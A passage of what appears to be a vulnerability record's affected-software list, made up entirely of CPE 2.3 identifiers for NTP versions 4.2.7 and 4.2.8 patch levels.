"cpe:2.3:a:ntp:ntp:4.2.8:p1-beta3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p146:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p122:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p435:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p480:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p159:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p284:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p200:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p165:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p322:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p22:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p176:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p418:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p33:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p384:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p54:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p307:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p467:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p187:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p407:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p303:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p72:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p74:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p243:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p442:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p475:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p158:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p308:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p366:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p39:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p63:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p316:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p296:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p392:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p399:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p347:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p460:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p434:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p148:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p236:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p218:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p80:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p145:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p318:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p62:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p188:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p288:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p177:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p450:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p175:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p416:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p142:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p149:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p121:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p101:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta5:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p380:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p238:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p373:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p8:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p463:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p286:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p341:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p77:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p81:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p439:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p58:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p474:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p369:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p171:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p181:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p129:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p49:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p331:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p97:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p292:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p207:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p202:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p83:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p445:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p481:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p84:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p464:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p237:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p98:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p273:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p376:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p363:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p25:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p34:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p154:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p147:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p90:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p106:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p141:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p281:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p293:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p255:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p24:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p155:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p325:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p430:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p453:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p483:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p381:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p151:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p143:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p150:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p469:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p161:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p206:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p9:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p103:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p67:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p406:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p118:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p411:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p275:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p5:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p320:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p345:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p473:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta4:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p59:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p324:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p216:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p89:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p269:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p37:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p344:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p92:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p428:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p28:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p456:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p111:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p55:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p36:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p438:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p378:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p203:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p234:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p305:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p196:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p209:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p156:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p329:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p294:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p198:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p427:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p314:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p41:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p162:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p46:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p323:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p172:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p78:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p408:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p358:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p23:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p135:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p226:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p319:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p133:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p130:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p270:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p448:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p45:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p352:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p263:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p420:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p190:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p360:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p223:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p298:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p116:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p388:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p47:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p230:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p228:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p245:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p7:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p86:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p336:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p432:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p138:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p76:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p214:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p429:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p105:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p337:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p144:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p174:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p412:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p87:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p457:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p264:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p160:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p79:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p128:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p295:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p396:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p342:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p124:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p395:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p42:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p386:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p332:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p452:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p104:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p88:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p215:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p139:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p69:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p304:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p164:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p229:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:-:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p443:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p361:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p191:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p393:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p468:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p421:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p112:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p299:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p152:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p186:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p30:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p217:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p425:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p195:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p274:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p390:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p248:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p359:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p449:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p65:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p401:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p355:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p40:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p211:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p301:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p350:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p137:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p356:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p35:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p346:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p353:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p486_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p53:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p113:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p372:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p5:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p272:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p125:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p208:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p166:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p233:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p370:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p266:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p32:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p85:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p70:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p244:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p201:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p64:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p123:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p422:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p50:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p219:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p400:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p415:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p68:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p99:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p330:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p221:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p212:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p287:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p413:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p182:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p205:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p259:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p94:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p389:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p75:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p102:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p410:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p276:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p339:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p479:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p335:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p257:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p431:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p265:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p6:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p458:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p241:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p409:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p235:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p179:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p260:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p397:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p368:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p213:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p127:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p348:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p436:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p253:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p60:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p108:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p297:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p465:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p375:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p119:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p136:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p170:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p250:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p334:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p385:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p73:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p120:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p309:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p313:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p478:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p447:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p271:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p351:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p402:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p163:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p268:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p57:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p446:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p403:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p471:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p289:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p326:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p100:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p157:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p110:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p470:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p280:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p6:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p364:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p258:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p197:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p302:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p52:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p180:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p282:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p131:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p379:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p262:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p184:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p109:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p315:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p210:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p340:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p261:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p115:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p183:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p327:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p204:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p394:*:*:*:*:*:*", 